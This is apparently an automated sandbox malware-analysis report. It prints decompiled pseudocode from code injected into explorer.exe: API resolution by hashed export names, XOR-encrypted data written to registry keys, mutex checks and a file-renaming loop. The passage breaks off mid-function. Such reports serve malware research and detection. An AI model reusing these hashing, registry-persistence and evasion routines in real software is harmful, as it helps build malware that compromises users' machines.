                  				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                  				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                  				if(_t41 == 0) {
                  					L4:
                  					return 0;
                  				}
                  				_t62 = _t41 + __ecx;
                  				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                  				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                  				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                  				_t47 = 0;
                  				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_v8 = 0;
                  				_v16 = _t63;
                  				if(_t63 == 0) {
                  					goto L4;
                  				} else {
                  					goto L2;
                  				}
                  				while(1) {
                  					L2:
                  					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                  					_t51 = _v8;
                  					if((_t49 ^ 0x218fe95b) == _v12) {
                  						break;
                  					}
                  					_t73 = _v20;
                  					_t47 = _t51 + 1;
                  					_v8 = _t47;
                  					if(_t47 < _v16) {
                  						continue;
                  					}
                  					goto L4;
                  				}
                  				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                  				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                  				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                  					return _t80;
                  				} else {
                  					_t56 = 0;
                  					while(1) {
                  						_t70 = _t80[_t56];
                  						if(_t70 == 0x2e || _t70 == 0) {
                  							break;
                  						}
                  						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                  						_t56 = _t56 + 1;
                  						if(_t56 < 0x40) {
                  							continue;
                  						}
                  						break;
                  					}
                  					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                  					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                  					if( *((char*)(_t56 + _t80)) != 0) {
                  						_t80 =  &(( &(_t80[1]))[_t56]);
                  					}
                  					_t40 =  &_v92; // 0x6c6c642e
                  					_t58 = LoadLibraryA(_t40); // executed
                  					if(_t58 == 0) {
                  						goto L4;
                  					}
                  					_t59 = GetProcAddress(_t58, _t80);
                  					if(_t59 == 0) {
                  						goto L4;
                  					}
                  					return _t59;
                  				}
                  			}


























                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                  • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 543 89b43-89b75 call 88604 546 89b7e-89b9e call 8b5f6 543->546 547 89b77-89b79 543->547 551 89ba0 546->551 552 89ba3-89bb8 call 895c7 546->552 548 89e1a-89e1e 547->548 551->552 555 89cee-89cfb 552->555 556 89bbe-89bd6 552->556 557 89d3c-89d4c call 89292 555->557 558 89cfd-89d1e 555->558 563 89ceb 556->563 564 89bdc-89bf8 556->564 567 89d4f-89d51 557->567 565 89d20-89d3a call 89292 558->565 566 89d54-89d74 call 885c2 RegOpenKeyExA 558->566 563->555 564->566 573 89bfe-89c18 call 89292 564->573 565->567 574 89dc8-89dcd 566->574 575 89d76-89d8b RegCreateKeyA 566->575 567->566 580 89d8d-89db2 call 8861a memset call 8861a 573->580 582 89c1e-89c36 573->582 577 89dcf 574->577 578 89dd5 574->578 579 89dba-89dbf 575->579 575->580 577->578 585 89dd8-89df4 call 8c379 578->585 583 89dc1 579->583 584 89dc3-89dc6 579->584 580->579 592 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 582->592 593 89cab-89cb0 582->593 583->584 584->585 599 89e0b-89e18 call 8861a 585->599 600 89df6-89e09 585->600 615 89c8b-89ca9 call 8861a * 2 592->615 616 89c7e-89c83 592->616 598 89cb6-89ce9 call 89292 call 8861a 593->598 598->566 599->548 600->599 600->600 615->598 616->615 618 89c85 616->618 618->615
                  C-Code - Quality: 89%
                  			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                  				void* _v8;
                  				int _v12;
                  				void* _v16;
                  				void* _v20;
                  				int _v24;
                  				void* _v28;
                  				char _v32;
                  				char _v36;
                  				int* _v40;
                  				int** _v44;
                  				void _v108;
                  				int* _t90;
                  				void* _t91;
                  				char* _t92;
                  				long _t96;
                  				int* _t97;
                  				intOrPtr _t98;
                  				int* _t101;
                  				long _t111;
                  				int* _t112;
                  				intOrPtr _t122;
                  				char* _t125;
                  				intOrPtr _t126;
                  				intOrPtr _t128;
                  				int* _t129;
                  				intOrPtr _t131;
                  				int* _t133;
                  				intOrPtr _t134;
                  				int* _t135;
                  				intOrPtr _t136;
                  				char* _t139;
                  				int _t143;
                  				int _t147;
                  				intOrPtr _t148;
                  				int* _t149;
                  				int* _t154;
                  				int** _t155;
                  				int* _t161;
                  				int* _t163;
                  				intOrPtr _t164;
                  				intOrPtr _t171;
                  				int _t176;
                  				char* _t177;
                  				char* _t178;
                  				char _t179;
                  				void* _t180;
                  				void* _t181;
                  				void* _t183;
                  
                  				_t176 = 0;
                  				_v24 = __edx;
                  				_t177 = 0;
                  				_v32 = __ecx;
                  				_v28 = 0;
                  				_v8 = 0x80000001;
                  				_v20 = 0;
                  				_t155 = E00088604(0x110);
                  				_v44 = _t155;
                  				if(_t155 != 0) {
                  					_t158 = _a4;
                  					_t155[0x42] = _a4;
                  					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                  					_t161 = _v108;
                  					__eflags = _t161 - 0x61 - 0x19;
                  					_t90 = _t161;
                  					if(_t161 - 0x61 <= 0x19) {
                  						_t90 = _t90 - 0x20;
                  						__eflags = _t90;
                  					}
                  					_v108 = _t90;
                  					_t91 = E000895C7(0x4d2);
                  					_t163 = _v24;
                  					_v16 = _t91;
                  					__eflags = _t163;
                  					if(_t163 == 0) {
                  						L16:
                  						_t164 =  *0x9e688; // 0xb0000
                  						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                  							_push(_t176);
                  							_push( &_v108);
                  							_push("\\");
                  							_t92 = E00089292(_t91);
                  							_t181 = _t181 + 0x10;
                  							L20:
                  							_t177 = _t92;
                  							_v20 = _t177;
                  							goto L21;
                  						}
                  						_v24 = _t176;
                  						_v8 = 0x80000003;
                  						_t122 =  *0x9e68c; // 0x40fab8
                  						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                  						__eflags = _v24 - _t177;
                  						if(_v24 == _t177) {
                  							goto L21;
                  						}
                  						_push(_t176);
                  						_push( &_v108);
                  						_t125 = "\\";
                  						_push(_t125);
                  						_push(_v16);
                  						_push(_t125);
                  						_t92 = E00089292(_v24);
                  						_t181 = _t181 + 0x18;
                  						goto L20;
                  					} else {
                  						_t126 =  *0x9e688; // 0xb0000
                  						_t128 =  *0x9e68c; // 0x40fab8
                  						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                  						__eflags = _t129;
                  						if(_t129 != 0) {
                  							_t91 = _v16;
                  							goto L16;
                  						}
                  						_v12 = _t176;
                  						_t131 =  *0x9e68c; // 0x40fab8
                  						_v8 = 0x80000003;
                  						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                  						__eflags = _v12 - _t177;
                  						if(_v12 == _t177) {
                  							L21:
                  							E000885C2( &_v16);
                  							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                  							__eflags = _t96;
                  							if(_t96 == 0) {
                  								_t97 = _a8;
                  								__eflags = _t97;
                  								if(_t97 != 0) {
                  									 *_t97 = 1;
                  								}
                  								_push(_v28);
                  								L30:
                  								_t98 =  *0x9e68c; // 0x40fab8
                  								 *((intOrPtr*)(_t98 + 0x1c))();
                  								_t155[0x43] = _v8;
                  								_t101 = E0008C379(_t177);
                  								 *_t155 = _t101;
                  								__eflags = _t101;
                  								if(_t101 == 0) {
                  									L32:
                  									E0008861A( &_v20, 0xffffffff);
                  									return _t155;
                  								} else {
                  									goto L31;
                  								}
                  								do {
                  									L31:
                  									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                  									_t176 = _t176 + 1;
                  									__eflags = _t176 -  *_t155;
                  								} while (_t176 <  *_t155);
                  								goto L32;
                  							}
                  							_v16 = _t176;
                  							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                  							__eflags = _t111;
                  							if(_t111 == 0) {
                  								_t112 = _a8;
                  								__eflags = _t112;
                  								if(_t112 != 0) {
                  									 *_t112 = _t176;
                  								}
                  								_push(_v16);
                  								goto L30;
                  							}
                  							L23:
                  							E0008861A( &_v44, 0x110);
                  							memset( &_v108, _t176, 0x40);
                  							E0008861A( &_v20, 0xffffffff);
                  							goto L1;
                  						}
                  						_push(_t176);
                  						_push(_v16);
                  						_t178 = "\\";
                  						_push(_t178);
                  						_t133 = E00089292(_v12);
                  						_t181 = _t181 + 0x10;
                  						_v40 = _t133;
                  						__eflags = _t133;
                  						if(_t133 == 0) {
                  							goto L23;
                  						}
                  						_t134 =  *0x9e68c; // 0x40fab8
                  						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                  						__eflags = _t135;
                  						if(_t135 == 0) {
                  							_t136 =  *0x9e68c; // 0x40fab8
                  							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                  						} else {
                  							_t143 = E000895E1( &_v36, 0x34);
                  							_v24 = _t143;
                  							_t179 = E000892E5(_v32);
                  							_v32 = _t179;
                  							E000885D5( &_v24);
                  							_t183 = _t181 + 0x18;
                  							_t147 = E00089256(_v12);
                  							_v24 = _t147;
                  							_t148 =  *0x9e68c; // 0x40fab8
                  							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                  							__eflags = _t149;
                  							if(_t149 == 0) {
                  								_t154 = _a12;
                  								__eflags = _t154;
                  								if(_t154 != 0) {
                  									 *_t154 = 1;
                  								}
                  							}
                  							E0008861A( &_v32, 0xfffffffe);
                  							E0008861A( &_v24, 0xfffffffe);
                  							_t181 = _t183 + 0x10;
                  							_t178 = "\\";
                  						}
                  						_t139 = E00089292(_v12);
                  						_t171 =  *0x9e684; // 0x40f8f0
                  						_t181 = _t181 + 0x18;
                  						_t177 = _t139;
                  						_v20 = _t177;
                  						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                  						E0008861A( &_v40, 0xffffffff);
                  						goto L21;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}




















































                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
                  • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                  • Opcode Fuzzy Hash: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
                  • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                  				char* _v12;
                  				char _v16;
                  				int _v20;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				char* _v32;
                  				char _v52;
                  				char _v64;
                  				char _v328;
                  				char _v2832;
                  				signed int _t48;
                  				signed int _t49;
                  				char* _t54;
                  				long _t73;
                  				long _t80;
                  				long _t83;
                  				void* _t88;
                  				char* _t89;
                  				intOrPtr _t90;
                  				void* _t103;
                  				void* _t104;
                  				char* _t106;
                  				intOrPtr _t107;
                  				char _t108;
                  
                  				_t48 = __ecx;
                  				_t89 = __edx;
                  				_v24 = __ecx;
                  				if(_a4 == 0 || _a8 == 0) {
                  					L13:
                  					_t49 = _t48 | 0xffffffff;
                  					__eflags = _t49;
                  					return _t49;
                  				} else {
                  					_t115 = __edx;
                  					if(__edx == 0) {
                  						goto L13;
                  					}
                  					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                  					_push(_t107);
                  					_t103 = 4;
                  					_v12 = __edx;
                  					_v28 = E0008D400( &_v12, _t103);
                  					_t93 = _t107 + __edx;
                  					E00092301(_t107 + __edx,  &_v2832);
                  					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                  					_t108 = _a8;
                  					_v12 = _t54;
                  					_v20 = _t54 + 6 + _t108;
                  					_t106 = E00088604(_t54 + 6 + _t108);
                  					_v32 = _t106;
                  					if(_t106 != 0) {
                  						 *_t106 = _a12;
                  						_t16 =  &(_t106[6]); // 0x6
                  						_t106[1] = 1;
                  						_t106[2] = _t108;
                  						E000886E1(_t16, _a4, _t108);
                  						_t21 = _t108 + 6; // 0x6
                  						E000922D3( &_v2832, _t21 + _t106, _v12);
                  						_v16 = _t89;
                  						_t90 = _v24;
                  						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                  						_push( &_v52);
                  						_t104 = 8;
                  						E0008F490( &_v16, _t104);
                  						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
                  						E0008EB2E(_t106, _v20,  &_v328);
                  						_t73 = E00089B0E(_t90);
                  						_v12 = _t73;
                  						__eflags = _t73;
                  						if(_t73 != 0) {
                  							E000897A0(_v28,  &_v64, 0x10);
                  							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                  							__eflags = _t80;
                  							if(_t80 == 0) {
                  								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                  								__eflags = _t83;
                  								if(_t83 != 0) {
                  									_push(0xfffffffc);
                  									_pop(0);
                  								}
                  								RegCloseKey(_a4);
                  							} else {
                  								_push(0xfffffffd);
                  								_pop(0);
                  							}
                  							E0008861A( &_v12, 0xffffffff);
                  						}
                  						E0008861A( &_v32, 0);
                  						return 0;
                  					}
                  					_t88 = 0xfffffffe;
                  					return _t88;
                  				}
                  			}

                  APIs
                    • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapOpen_ftol2_sse
                  • String ID:
                  • API String ID: 3756893521-0
                  • Opcode ID: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
                  • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                  • Opcode Fuzzy Hash: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
                  • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t12;
                  				void* _t20;
                  				void* _t22;
                  				union _TOKEN_INFORMATION_CLASS _t28;
                  				void* _t31;
                  
                  				_push(_t22);
                  				_push(_t22);
                  				_t31 = 0;
                  				_t28 = __edx;
                  				_t20 = _t22;
                  				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                  					L6:
                  					_t12 = _t31;
                  				} else {
                  					_t31 = E00088604(_v8);
                  					_v12 = _t31;
                  					if(_t31 != 0) {
                  						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                  							goto L6;
                  						} else {
                  							E0008861A( &_v12, _t16);
                  							goto L3;
                  						}
                  					} else {
                  						L3:
                  						_t12 = 0;
                  					}
                  				}
                  				return _t12;
                  			}

                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                  • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InformationToken$AllocateErrorHeapLast
                  • String ID:
                  • API String ID: 2499131667-0
                  • Opcode ID: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
                  • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                  • Opcode Fuzzy Hash: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
                  • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                  				intOrPtr _t10;
                  				void* _t13;
                  				void* _t19;
                  				signed int _t21;
                  				signed int _t22;
                  
                  				_t13 = __edx;
                  				if(__ecx != 0) {
                  					_t22 = 0;
                  					_t19 = CreateMutexA(0, 1, __ecx);
                  					if(_t19 != 0) {
                  						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                  							_t22 = 1;
                  							 *_a4 = _t19;
                  						} else {
                  							_t10 =  *0x9e684; // 0x40f8f0
                  							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                  						}
                  					} else {
                  						GetLastError();
                  						_t22 = 0xffffffff;
                  					}
                  				} else {
                  					_t22 = _t21 | 0xffffffff;
                  				}
                  				return _t22;
                  			}

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                  • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID:
                  • API String ID: 1925916568-0
                  • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                  • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A471(CHAR* __ecx, void* __edx) {
                  				intOrPtr _t8;
                  				void* _t16;
                  				void* _t17;
                  
                  				_t16 = __edx; // executed
                  				_t17 = CreateMutexA(0, 1, __ecx);
                  				if(_t17 != 0) {
                  					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
                  						_t8 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                  						_t17 = 0;
                  					}
                  					return _t17;
                  				}
                  				GetLastError();
                  				return 0;
                  			}

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                  • GetLastError.KERNEL32 ref: 0008A48B
                  • GetLastError.KERNEL32 ref: 0008A495
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateMutex
                  • String ID:
                  • API String ID: 200418032-0
                  • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                  • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00086DA0(void* __eflags, void* __fp0) {
                  				short _v536;
                  				WCHAR* _v544;
                  				WCHAR* _t9;
                  				intOrPtr _t10;
                  				intOrPtr _t11;
                  				void* _t22;
                  				void* _t32;
                  				intOrPtr _t34;
                  				intOrPtr _t35;
                  				intOrPtr _t41;
                  				intOrPtr _t43;
                  				intOrPtr _t46;
                  				intOrPtr _t49;
                  				void* _t51;
                  				void* _t53;
                  				void* _t56;
                  				WCHAR* _t59;
                  				signed int _t60;
                  				void* _t62;
                  				void* _t63;
                  				void* _t74;
                  
                  				_t74 = __fp0;
                  				_t34 =  *0x9e778; // 0x40fc08
                  				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                  				_t51 = 0x31;
                  				_t32 = 1; // executed
                  				_t9 = E00089ED0(_t34, _t51); // executed
                  				if(_t9 != 0) {
                  					_t10 =  *0x9e78c; // 0x0
                  					_t66 = _t10;
                  					if(_t10 == 0) {
                  						_t49 =  *0x9e688; // 0xb0000
                  						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
                  						 *0x9e78c = _t10;
                  					}
                  					_push(0);
                  					_push(_t10);
                  					_t11 =  *0x9e688; // 0xb0000
                  					_push(L"\\c");
                  					_t9 = E000892E5(_t11 + 0x438);
                  					_t59 = _t9;
                  					_t63 = _t62 + 0x10;
                  					_v544 = _t59;
                  					if(_t59 != 0) {
                  						while(1) {
                  							_t35 =  *0x9e688; // 0xb0000
                  							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
                  							if(_t56 == 0) {
                  								break;
                  							}
                  							if(E0008B269(_t59) == 0) {
                  								_t32 = E0008F14F(_t59, 0x1388, _t74);
                  							}
                  							E0008A4DB(_t56);
                  							_t41 =  *0x9e684; // 0x40f8f0
                  							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                  							if(_t32 > 0) {
                  								E0008980C( &_v544);
                  								_t43 =  *0x9e778; // 0x40fc08
                  								_t53 = 0x33;
                  								if(E00089ED0(_t43, _t53) != 0) {
                  									L12:
                  									__eflags = E00081C68(_t59, __eflags, _t74);
                  									if(__eflags >= 0) {
                  										E0008B1B1(_t59, _t53, __eflags, _t74);
                  										continue;
                  									}
                  								} else {
                  									_t46 =  *0x9e778; // 0x40fc08
                  									_t53 = 0x12;
                  									_t22 = E00089ED0(_t46, _t53);
                  									_t72 = _t22;
                  									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
                  										_push(E0008980C(0));
                  										E00089640( &_v536, 0x104, L"%s.%u", _t59);
                  										_t63 = _t63 + 0x14;
                  										MoveFileW(_t59,  &_v536);
                  										continue;
                  									} else {
                  										goto L12;
                  									}
                  								}
                  							}
                  							break;
                  						}
                  						_t9 = E0008861A( &_v544, 0xfffffffe);
                  					}
                  				}
                  				return _t9;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileMove
                  • String ID: %s.%u
                  • API String ID: 3562171763-1288070821
                  • Opcode ID: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
                  • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                  • Opcode Fuzzy Hash: 18816e49f38be429948ef6d3383d30e391c2da75528b0b403aeef7b17627c66c
                  • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00082AEA() {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				CHAR* _v16;
                  				signed int _t16;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				void* _t26;
                  				void* _t29;
                  				signed int _t31;
                  				intOrPtr _t36;
                  				CHAR* _t38;
                  				intOrPtr _t39;
                  				void* _t40;
                  
                  				_t15 =  *0x9e710 * 0x64;
                  				_t39 = 0;
                  				_v12 =  *0x9e710 * 0x64;
                  				_t16 = E00088604(_t15);
                  				_t38 = _t16;
                  				_v16 = _t38;
                  				if(_t38 != 0) {
                  					_t31 =  *0x9e710; // 0x2
                  					_t36 = 0;
                  					_v8 = 0;
                  					if(_t31 == 0) {
                  						L9:
                  						_push(_t38);
                  						E00089F48(0xe); // executed
                  						E0008861A( &_v16, _t39);
                  						return 0;
                  					}
                  					_t29 = 0;
                  					do {
                  						_t21 =  *0x9e714; // 0x12d0960
                  						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                  							if(_t39 != 0) {
                  								lstrcatA(_t38, "|");
                  								_t39 = _t39 + 1;
                  							}
                  							_t22 =  *0x9e714; // 0x12d0960
                  							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                  							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                  							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                  							_t31 =  *0x9e710; // 0x2
                  							_t40 = _t40 + 0x18;
                  							_t36 = _v8;
                  							_t39 = _t39 + _t26;
                  						}
                  						_t36 = _t36 + 1;
                  						_t29 = _t29 + 0x20;
                  						_v8 = _t36;
                  					} while (_t36 < _t31);
                  					goto L9;
                  				}
                  				return _t16 | 0xffffffff;
                  			}

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcat
                  • String ID: %u;%u;%u
                  • API String ID: 3011335133-2973439046
                  • Opcode ID: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
                  • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                  • Opcode Fuzzy Hash: 7a3fd77245582d844e0d8f1f61c7398da9a49d0849e7c8a4a8e8fb0d67d6490a
                  • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E0008BD10() {
                  				char _v8;
                  				void* _v12;
                  				char _v16;
                  				short _v20;
                  				char _v24;
                  				short _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
